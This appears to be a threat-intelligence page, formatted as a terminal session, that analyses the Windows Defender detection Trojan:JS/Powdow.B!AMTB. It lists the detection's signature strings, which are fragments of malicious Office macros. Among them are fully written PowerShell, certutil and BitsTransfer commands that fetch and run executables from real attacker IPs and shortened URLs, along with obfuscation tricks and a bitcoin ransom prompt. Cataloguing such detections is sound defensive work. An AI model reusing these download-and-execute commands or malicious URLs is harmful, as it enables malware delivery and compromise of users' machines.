user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Trojan:JS/Powdow.B!AMTB
Trojan:JS/Powdow.B!AMTB - Windows Defender threat signature analysis

Trojan:JS/Powdow.B!AMTB - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:JS/Powdow.B!AMTB
Classification:
Type:Trojan
Platform:JS
Family:Powdow
Detection Type:Concrete
Known malware family with identified signatures
Variant:B
Specific signature variant within the malware family
Suffix:!AMTB
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for JavaScript platform, family Powdow

VDM Static Detection:
Relevant strings associated with this threat:
 - (nEw-oB`jecT (MACROHSTR_EXT)
 - ttps://cutt.ly/8jmDPVb (MACROHSTR_EXT)
 - ttps://cutt.ly/fjYtydH (MACROHSTR_EXT)
 - = Replace(x, "bbnnedetcy", "") (MACROHSTR_EXT)
 - = ActiveCell.Offset(iC, 1).Value (MACROHSTR_EXT)
 - Call yGGsvaB.pkutdFZ (MACROHSTR_EXT)
 - URLDownloadToFile 0, ImagemSimplesCDT, MasterCDT & "document.vbs", 0, 0 (MACROHSTR_EXT)
 - hzunLrU.Run IpRAhYeJ + nYJEZJtb + yKijjyI, RValue (MACROHSTR_EXT)
 - = ActiveDocument.BuiltInDocumentProperties("Comments") (MACROHSTR_EXT)
 - Set hzunLrU = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - Shell ("C:\\Windows\\System32\\cmd.exe /c echo (MACROHSTR_EXT)
 - (wget 'https://tinyurl.com/y88r9epk' -OutFile a.exe) > b.ps1 (MACROHSTR_EXT)
 - powershell -ExecutionPolicy ByPass -File b.ps1 (MACROHSTR_EXT)
 - START /MIN a.exe (MACROHSTR_EXT)
 - %37%A6%E2%F6%47%96%47%F2%13%13%13%E2%83%53%13%E2%73%23%23%E2%23%93%13%F2%F2%A3%07%47%47%86%72%72%82%56%72%B2%72%C6%96%72%B2%72%64%72%B2%72%46%72%B2%72%16%F6% (MACROHSTR_EXT)
 - tilpS.srahCiics (MACROHSTR_EXT)
 - powershell.exe  -ExecutionPolicy Bypass -NoProfile -WindowStyle hidden (MACROHSTR_EXT)
 - Encodedcommand cABvAHcAZQByAHMAaABlAGwAbAAuAGUAe (MACROHSTR_EXT)
 - = MsgBox("WE HAVE ALL YOUR DATA- YOU WANT PAY?-0.2bitcoin-78fcWL7M8A7woRBdnPurezEsW1o63RVYUS", vbYesNo) (MACROHSTR_EXT)
 - = "https://long.af/FactDownParty" (MACROHSTR_EXT)
 - = CreateObject(Replace("W`7cript.`7hell", "`7", "s")) (MACROHSTR_EXT)
 - H1H9.Run (H4H6 + H2H6), 0, True (MACROHSTR_EXT)
 - = CreateObject(Replace("W^^cript.^^hell", "^^", "s")) (MACROHSTR_EXT)
 - H8H2.Run (H8H7 + H2H2), 0, True (MACROHSTR_EXT)
 - = soIfx18n(UserForm1.Label1.Caption) (MACROHSTR_EXT)
 - .Environment("process").Item("param1") = (MACROHSTR_EXT)
 - .run "cmd /c call %param1%", 2 (MACROHSTR_EXT)
 - = wZjThH7x(UserForm1.Label1.Caption) (MACROHSTR_EXT)
 - = "C:\Users\Public\Documents\god." & (MACROHSTR_EXT)
 - .WriteLine  (MACROHSTR_EXT)
 -  & " -w hi sl^eep -Se 31;Sta^rt-BitsTr^ans^fer -Source htt (MACROHSTR_EXT)
 - Dest C:\Users\Public\Documents\bornexist.e`xe (MACROHSTR_EXT)
 - Shell ("powershell.exe c:\temp\spool.exe") (MACROHSTR_EXT)
 - Shell ("powershell.exe mkdir c:\temp") (MACROHSTR_EXT)
 - DownloadFile = URLDownloadToFile(0&, sSourceUrl, sLocalFile, BINDF_GETNEWESTVERSION, 0&) (MACROHSTR_EXT)
 - .createElement("b64") (MACROHSTR_EXT)
 - (StrReverse("pmet")) & "\ (MACROHSTR_EXT)
 - .tmp" (MACROHSTR_EXT)
 - .DataType = "bin.base64" (MACROHSTR_EXT)
 - .Text (MACROHSTR_EXT)
 - (StrReverse("pmt")) & "\ (MACROHSTR_EXT)
 - .Create  (MACROHSTR_EXT)
 - .CreateElement("base64") (MACROHSTR_EXT)
 - .dataType = "bin.base64" (MACROHSTR_EXT)
 - = Replace("C###:\###Win###do###ws\###Micr###osof###t.NET\Fr###amewo###rk\", "###", "") (MACROHSTR_EXT)
 - = Replace("\###ms###bu###ild.###exe", "###", "") (MACROHSTR_EXT)
 - (nEw-oB`jecT Net.WebcL`IENt) (MACROHSTR_EXT)
 - ttps://tinyurl.com/ybhxvxgd (MACROHSTR_EXT)
 - '+'/tc"&CHAR(46)&"scr') (MACROHSTR_EXT)
 - "&CHAR(46)&"exe') (MACROHSTR_EXT)
 - ttps://cutt.ly/FhDv631 (MACROHSTR_EXT)
 - ttps://tinyurl.com/yapo8pxs (MACROHSTR_EXT)
 - ttps://tinyurl.com/y8bcyly (MACROHSTR_EXT)
 - ttps://tinyurl.com/ybj5pmnf (MACROHSTR_EXT)
 - ttps://tinyurl.com/y9u7w4jj (MACROHSTR_EXT)
 - ttps://cutt.ly/fhAmjL3 (MACROHSTR_EXT)
 - bypass stARt`-slE`Ep 25 (MACROHSTR_EXT)
 - ttps://tinyurl.com/yapf7lfr (MACROHSTR_EXT)
 - ttps://cutt.ly/1hAnxyy (MACROHSTR_EXT)
 - Public Sub button1_Click() (MACROHSTR_EXT)
 - .exec p(getwc) (MACROHSTR_EXT)
 - = Split(p(frm.getwc), " ") (MACROHSTR_EXT)
 - = "explorer.exe c:\programdata\linkLenLeft.hta" (MACROHSTR_EXT)
 - frm.button1_Click (MACROHSTR_EXT)
 - <html><body><div id='content'>fTtl (MACROHSTR_EXT)
 - = "c:\windows\explorer.exe c:\programdata\ (MACROHSTR_EXT)
 - .hta" (MACROHSTR_EXT)
 - .exec p(rm) (MACROHSTR_EXT)
 - = Split(p(frm.rm), " ") (MACROHSTR_EXT)
 - End Sub (MACROHSTR_EXT)
 - = GetObject("winmgmts:root\cimv2:Win32_Process") (MACROHSTR_EXT)
 - .Create p(rm) (MACROHSTR_EXT)
 - = StrReverse("ath. (MACROHSTR_EXT)
 - 0\atadmargorp\:c exe.rerolpxe\swodniw\:c") (MACROHSTR_EXT)
 - nyKF_.rJ_p_8lil3RpqOvv_O_W (MACROHSTR_EXT)
 - .Run(pMTv_7C2fYjN, t_OWJGxE7fdFxr_t_t) (MACROHSTR_EXT)
 - HK8Pq.EYLELpctw3dQXdTA_n_f (MACROHSTR_EXT)
 - .Run(Lg966a_8DV, ckF_w_haok1B2_JN7oO1slJt) (MACROHSTR_EXT)
 - th5__685.zTYJlT3ZqSjabVVFVHHa (MACROHSTR_EXT)
 - .Run(RoouGg_TSZq_pydveOTZ, R__c1B5uM4c) (MACROHSTR_EXT)
 - .CreateObject("wscript.s" &  (MACROHSTR_EXT)
 - ).exec(powerrange & "hell -w " & protei & "den Invoke-WebRequest -Uri (MACROHSTR_EXT)
 - http://31.210.20.6/w2/PLP_017542000.ex (MACROHSTR_EXT)
 - -OutF" & "ile " & Chr(34) & "C:\Users\Public\Documents\ (MACROHSTR_EXT)
 - = CreateObject("wscript." & Chr(115) &  (MACROHSTR_EXT)
 - ).Run( (MACROHSTR_EXT)
 -  & " -w h Start-Bit" & Chr(115) & "Transfer -Source " & Chr(34) (MACROHSTR_EXT)
 - htt`p://31.210.20.45/zCH/ (MACROHSTR_EXT)
 - Destination " & Chr(34) & "C:\Users\Public\Documents\ (MACROHSTR_EXT)
 - .ex" & Chr(101) (MACROHSTR_EXT)
 - = CreateObject("wscript.s" &  (MACROHSTR_EXT)
 - http://31.210.20.45/1xBet/ (MACROHSTR_EXT)
 - .ex" & Chr(101) & Chr(34) & (MACROHSTR_EXT)
 - powerr & rshell & " -w h Start-BitsTransfer -Source (MACROHSTR_EXT)
 - https://cargotrans-giobal.com/h/file.exe (MACROHSTR_EXT)
 - Destination C:\Users\Public\Documents\ (MACROHSTR_EXT)
 - .exe (MACROHSTR_EXT)
 - = "C:\Users\Public\Documents\buildingsociety.bat" (MACROHSTR_EXT)
 - powerr & rl & " -w h Start-BitsTransfer -Source (MACROHSTR_EXT)
 - -Destination C:\Users\Public\Documents\factfriend.exe (MACROHSTR_EXT)
 - .Open( (MACROHSTR_EXT)
 - .Run(wjttawuooaxjkck, dkntlgktpsdktfu) (MACROHSTR_EXT)
 - .ShellExecute "P" + fd45cvv0, fgfjhfgfg, "", "", 0 (MACROHSTR_EXT)
 - = GxhtKEm(BaVu, lLSU) (MACROHSTR_EXT)
 - BKJaHfE.Name = "Comments" Then (MACROHSTR_EXT)
 - Public Function wU4acz8CD(dMimp As String, dMimp2 As String) As String (MACROHSTR_EXT)
 - Set uqvTMY5QA = CreateObject(dMimp2) (MACROHSTR_EXT)
 - wU4acz8CD = uqvTMY5QA.Replace(nnMhv(0), "") (MACROHSTR_EXT)
 - Public Function Ri0GPh(HwTeVD8af As String, HwTeVD8af2 As String) As String (MACROHSTR_EXT)
 - Set l0FqzrmzJ = CreateObject(HwTeVD8af2) (MACROHSTR_EXT)
 - Ri0GPh = l0FqzrmzJ.Replace(DqqlX(0), "") (MACROHSTR_EXT)
 - = "C:\Users\Public\Documents\firstdegree.bat" (MACROHSTR_EXT)
 - treealong & breakmorning & " -w h Start-BitsTransfer -Source htt (MACROHSTR_EXT)
 - Destination C:\Users\Public\Documents\eatand.e`xe (MACROHSTR_EXT)
 - .Run(iknrwroprqpsmrgy, ahrzrxiqdlluofuxlmzmikrytjclwtkawi) (MACROHSTR_EXT)
 - Attribute VB_Name = " (MACROHSTR_EXT)
 - Sub init( (MACROHSTR_EXT)
 - 0End Sub (MACROHSTR_EXT)
 -  .exec "cmd /c " +  (MACROHSTR_EXT)
 -  End Sub (MACROHSTR_EXT)
 - Sub document_open() (MACROHSTR_EXT)
 - init "c:\programdata\1.hta", Replace(ActiveDocument.Content, " (MACROHSTR_EXT)
 -   = New IWshRuntimeLibrary.WshShell (MACROHSTR_EXT)
 -  .exec "explorer " +  (MACROHSTR_EXT)
 - init "1.hta", Replace(ActiveDocument.Content, " (MACROHSTR_EXT)
 - Sub i( (MACROHSTR_EXT)
 - @End Sub (MACROHSTR_EXT)
 -  .exec "c:\\windows\\explorer " +  (MACROHSTR_EXT)
 - Call i("1.hta", Replace(ActiveDocument.Content, " (MACROHSTR_EXT)
 - Sub xyz( (MACROHSTR_EXT)
 -  .exec "c:\\..\\..\\..\\windows\\" +  (MACROHSTR_EXT)
 - Call xyz("1.hta", Replace(ActiveDocument.Content, "^)", "")) (MACROHSTR_EXT)
 -  .h", "" (MACROHSTR_EXT)
 - Sub XR( (MACROHSTR_EXT)
 - Print #1, Replace(ActiveDocument.Range.Text, "#-", "") (MACROHSTR_EXT)
 - = New IWshRuntimeLibrary.WshShell (MACROHSTR_EXT)
 -  .exec  (MACROHSTR_EXT)
 - .Run(nujvftidx, bljdawuuvmyoznsbkqunwwwypldqxbobddvlb) (MACROHSTR_EXT)
 - cnl.jvx (MACROHSTR_EXT)
 - jhtfhpu (ibeqpmnnzxqgksuktwi) (MACROHSTR_EXT)
 - zsnlxghozynajbtputwvqtgrbrlarjbaua (vfjfsfvyjajiyubtf) (MACROHSTR_EXT)
 - swl.zzax (MACROHSTR_EXT)
 - .Run(uuszsrxknkzjscestu, osttyqkmgbkghhlqwygtyncyexufttvx) (MACROHSTR_EXT)
 -  .ht", ActiveDocument.Range.Text (MACROHSTR_EXT)
 - 'hjgjg ffhg5645n /*/ (MACROHSTR_EXT)
 - .Run( (MACROHSTR_EXT)
 -  .ht", ActiveDocument.Content (MACROHSTR_EXT)
 -   + "rer.exe " +  (MACROHSTR_EXT)
 - = hKw + HV + bhhzvEXcEKi + rhrZsWyO + REskFMEnGYi + ZffZFDDNiK + XY + kQYREnCiTsB + ACSJEaBLG + cJuudsQ (MACROHSTR_EXT)
 - uk.Run MzQDN, (MACROHSTR_EXT)
 - = IUHLQfTHGTE + CJPT + rzXcU + XVeeaQs + RLttdyRDBas + LBEFf + pkfwXQr + GiMNiBSNVMs + VGnNiV + hH + (MACROHSTR_EXT)
 - JOsQhMhKL.Run OfyC (MACROHSTR_EXT)
 - Sub eFile() (MACROHSTR_EXT)
 - Dim QQ1 As Object (MACROHSTR_EXT)
 - RO = "C:\ProgramData\" (MACROHSTR_EXT)
 - ROI = RO + "pin.vbs" (MACROHSTR_EXT)
 - WW = QQ1.t2.Caption (MACROHSTR_EXT)
 - fun = Shell("cmd /k cscript.exe C:\ProgramData\pin.vbs", Chr(48)) (MACROHSTR_EXT)
 - 'Result = MsgBox("  The document cannot be decrypted. ", vbAbortRetryIgnore + vbCritical, "  Error   0xc0000142   ") (MACROHSTR_EXT)
 - Sub AutoOpen() (MACROHSTR_EXT)
 - bxh.eFile (MACROHSTR_EXT)
 - sSplit = Split(UCase$(Trim$(Email)), ".") (MACROHSTR_EXT)
 - Get #refFile, , tmpByte4 (MACROHSTR_EXT)
 - Print #1, VBA$.Replace( (MACROHSTR_EXT)
 -  .run  (MACROHSTR_EXT)
 -  .h", ActiveDocument.Content (MACROHSTR_EXT)
 - .CreateTextFile( (MACROHSTR_EXT)
 -  .WriteLine VBA.Replace$( (MACROHSTR_EXT)
 -  .Close (MACROHSTR_EXT)
 - 0.run  (MACROHSTR_EXT)
 -   = ActiveDocument.BuiltInDocumentProperties( (MACROHSTR_EXT)
 -  ).Value (MACROHSTR_EXT)
 - Public Function s( (MACROHSTR_EXT)
 - GetObject("", "wscript.shell").exec text1("category") + " " +  (MACROHSTR_EXT)
 - StrReverse(ThisDocument.text1("keywords")) (MACROHSTR_EXT)
 - ActiveDocument.SaveAs2 FileName:= (MACROHSTR_EXT)
 -  ThisDocument.s (MACROHSTR_EXT)
 - Function vbnghfg(xcdsg As Variant) (MACROHSTR_EXT)
 - vxcxb = "vxcb bxcb cbvcxb" (MACROHSTR_EXT)
 - Public Sub wordExcel( (MACROHSTR_EXT)
 - Print #1, Replace(ActiveDocument.Range.Text, "&lt;", "") (MACROHSTR_EXT)
 - .wordExcel  (MACROHSTR_EXT)
 -   & "...hTa" (MACROHSTR_EXT)
 -  .earthWindows  (MACROHSTR_EXT)
 - .Run cvgkjwG347rtHDFFGe46.TextBox1.Text & hrkwdjksdjbk, 0 (MACROHSTR_EXT)
 - -w hi slee^p -Se 31;Sta^rt-BitsTr^ansfer -Source htt (MACROHSTR_EXT)
 - -Destination C:\Users\Public\Documents\lineseries.e`xe (MACROHSTR_EXT)
 - = "C:\Users\Public\Documents\whenstep.cm" & Chr(CLng("99.6")) (MACROHSTR_EXT)
 - Call ebzxp.awoiceecjpjxticyffnb (MACROHSTR_EXT)
 - ngxetjb = hbjsd( (MACROHSTR_EXT)
 - Public Sub  (MACROHSTR_EXT)
 - & ".....hta.", Replace(ActiveDocument.Range.Text, "&lt;", "") (MACROHSTR_EXT)
 -   & ".....hta." (MACROHSTR_EXT)
 - call1 = "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe" (MACROHSTR_EXT)
 - start /MIN C:\Windo" + "ws\SysWOW64\" + call1 + " -win 1 -enc " + enc (MACROHSTR_EXT)
 - batch = " (MACROHSTR_EXT)
 - .bat" (MACROHSTR_EXT)
 - i = Shell(batch, 0) (MACROHSTR_EXT)
 - Call bhekdlsv.sqppmlmxxrxelvmsgjrj (MACROHSTR_EXT)
 - ewpbkbr = 70 - 70 (MACROHSTR_EXT)
 - "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe" (MACROHSTR_EXT)
 - start /MIN C:\Windo" (MACROHSTR_EXT)
 - Sub Document_open() (MACROHSTR_EXT)
 - 0 = main.r("c:\programdata\ (MACROHSTR_EXT)
 -  .h") (MACROHSTR_EXT)
 - 0 = main.r("c:\users\public\ (MACROHSTR_EXT)
 -  .ht") (MACROHSTR_EXT)
 - Attribute VB_Name = "main" (MACROHSTR_EXT)
 - Public Function r( (MACROHSTR_EXT)
 - msgbox "Error has occurred: External table is not in the expected format.", 16, "Microsoft Word" (MACROHSTR_EXT)
 - ActiveDocument.Content.Find.Execute FindText:="%_", ReplaceWith:="", Replace:=wdReplaceAll (MACROHSTR_EXT)
 - = "C:\Users\Public\Documents\himselfdespite.cm" & Chr(CLng(97.5) + CLng(1.6)) (MACROHSTR_EXT)
 - -w hi slee^p -Se 31;Sta^rt-BitsTrans^fer -Source htt (MACROHSTR_EXT)
 - = CreateObject(sheee & "l.application").Open (MACROHSTR_EXT)
 - = ActiveDocument.BuiltInDocumentProperties("Manager").Value (MACROHSTR_EXT)
 - With ActiveDocument.Content.Find (MACROHSTR_EXT)
 - .Execute FindText:="#)", ReplaceWith:= (MACROHSTR_EXT)
 - = ActiveDocument.BuiltInDocumentProperties(" (MACROHSTR_EXT)
 -  ").Value (MACROHSTR_EXT)
 - .Execute FindText:="%5", ReplaceWith:= (MACROHSTR_EXT)
 - bat = " (MACROHSTR_EXT)
 - s = s + "v\llehSrewoPswodniW\23metsyS\swodniW\:C" (MACROHSTR_EXT)
 - s = " cne- 1 niw- exe.llehsrewop\0.1" (MACROHSTR_EXT)
 - = "C:\Users\Public\Documents\god.bat (MACROHSTR_EXT)
 - -w hi sl^eep -Se 31;St^a^rt-BitsTr^ans^fer -Source htt`p://18.156.71.237/hN/5/B/ (MACROHSTR_EXT)
 - 0.e`xe -Dest C:\Users\Public\Documents\ (MACROHSTR_EXT)
 - 0.e`xe (MACROHSTR_EXT)
 - = ThisDocument.keywords (MACROHSTR_EXT)
 - ThisDocument.s  (MACROHSTR_EXT)
 - = .BuiltInDocumentProperties("keywords").Value (MACROHSTR_EXT)
 - ActiveDocument.Content.Find.Execute FindText:="_f", ReplaceWith:= (MACROHSTR_EXT)
 - = CreateObject("wscr" +  (MACROHSTR_EXT)
 -   + ".shell") (MACROHSTR_EXT)
 -  .exec "c:\windows\exp" &  (MACROHSTR_EXT)
 - .SaveAs2 FileName:= (MACROHSTR_EXT)
 - = CreateObject("wscript.shell") (MACROHSTR_EXT)
 -  .exec "explo" &  (MACROHSTR_EXT)
 -  ThisDocument.s  (MACROHSTR_EXT)
 -  , "ipt.sh" (MACROHSTR_EXT)
 -  .exec "c:\windows\explorer " &  (MACROHSTR_EXT)
 -   = ThisDocument. (MACROHSTR_EXT)
 - .SaveAs2 FileName (MACROHSTR_EXT)
 - ActiveDocument.Content.Find.Execute FindText:="$1", ReplaceWith:= (MACROHSTR_EXT)
 - main.karoline ("") (MACROHSTR_EXT)
 - = StrReverse(ThisDocument.keywords) (MACROHSTR_EXT)
 - ThisDocument.s StrReverse("llehs.tpircsw"),  (MACROHSTR_EXT)
 - %End Sub (MACROHSTR_EXT)
 - ThisDocument.s StrReverse("lle" +  (MACROHSTR_EXT)
 - = CreateObject( (MACROHSTR_EXT)
 -  ).exec("explorer " &  (MACROHSTR_EXT)
 - keywords = ActiveDocument.BuiltInDocumentProperties("keywords").Value (MACROHSTR_EXT)
 - ActiveDocument.Content.Find.Execute FindText:=" (MACROHSTR_EXT)
 - ThisDocument.s "wscript.shell",  (MACROHSTR_EXT)
 - = "hs.tpi" (MACROHSTR_EXT)
 - CreateObject( (MACROHSTR_EXT)
 -  ).exec "c:\windows\explorer " &  (MACROHSTR_EXT)
 - = "C:\Users\Public\dssdd.cmzd" (MACROHSTR_EXT)
 - = Replace(happenbuy, ".cmz", ".cm") (MACROHSTR_EXT)
 - Dest C:\Users\Public\Documents\presidentlow.e`xe (MACROHSTR_EXT)
 - = dogwater(0, "open", "explorer", happenbuy, "", 1) (MACROHSTR_EXT)
 - = StrReverse(ThisDocument.text1("keywords")) (MACROHSTR_EXT)
 - .SaveAs (MACROHSTR_EXT)
 - ThisDocument.s "",  (MACROHSTR_EXT)
 - GetObject("", text1("category")).exec StrReverse(" rerolpxe\swodniw\:c") + loadPowDoor (MACROHSTR_EXT)
 - = CallByName(UpFRK, "Sh" + "el" + "lExe" + "cute", VbMethod, tvet(0), tvet(1), tvet(2), tvet(3), tvet(4)) (MACROHSTR_EXT)
 - YIIPcawkM = brWWtI(g5, g6) (MACROHSTR_EXT)
 - Public Function executive( (MACROHSTR_EXT)
 - CreateObject("w" + Join(Split(getstr("company"), ","), ".")).exec (MACROHSTR_EXT)
 - %" & ThisDocument.getstr("comments") + "A") (MACROHSTR_EXT)
 - ThisDocument.executive  (MACROHSTR_EXT)
 - = Shell("cmd /c certutil.exe -urlcache -split -f ""http://13.112.233.199/share/ (MACROHSTR_EXT)
 - .exe.exe &&  (MACROHSTR_EXT)
 - .exe.exe", vbHide) (MACROHSTR_EXT)
 - eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.sdapeton\''+pmet:vne$,''sbv.tneilC/cam/lrpsw/moc.ehgityennikcm//: (MACROHSTR_EXT)
 - sbv.tneilC02%detcetorP/3/oc.hcnuphcnip//: (MACROHSTR_EXT)
 - IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\notepad.vbs') (MACROHSTR_EXT)
 - IEX (New-Object Net.WebClient).DownloadString('http://138.201.149.43/1Kaufvertrag682/as.ps1')", 0&, 0&, 1&, NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc) (MACROHSTR_EXT)
 - bdfdf = rdau.Open(v0df + "\eUOKm.bat") (MACROHSTR_EXT)
 - hoyqo = Range("B105").Value + " " + Range("B104").Value + Range("B103").Value + " -" + rev(Range("B102").Value) + rev(Range("B100").Value) (MACROHSTR_EXT)
 - |#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
 - }#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID)
 - |#75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 (NID)
 - }#75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 (NID)
 - &|#b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 (NID)
 - &}#b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 (NID)
 - y*|#56a863a9-875e-4185-98a7-b882c64b5ce5 (NID)
 - y*}#56a863a9-875e-4185-98a7-b882c64b5ce5 (NID)
 - C|#be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 (NID)
 - C}#be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 (NID)
 - L|#3b576869-a4ec-4529-8536-b80a7769e899 (NID)
 - L}#3b576869-a4ec-4529-8536-b80a7769e899 (NID)
 - |#5beb7efe-fd9a-4556-801d-275e5ffc04cc (NID)
 - }#5beb7efe-fd9a-4556-801d-275e5ffc04cc (NID)
 - |#01443614-cd74-433a-b99e-2ecdc07bfc25 (NID)
 - }#01443614-cd74-433a-b99e-2ecdc07bfc25 (NID)
 - |#d3e037e1-3eb8-44c8-a917-57927947596d (NID)
 - }#d3e037e1-3eb8-44c8-a917-57927947596d (NID)
 - |#7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c (NID)
 - }#7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c (NID)
Known malware which is associated with this threat:
f8b561cf9304b80fb39f4d714a290ffb12d7a2783bf19f9c4872b002e642eb65
22/03/2026
VirusTotalDownload Sample
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 22/03/2026. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$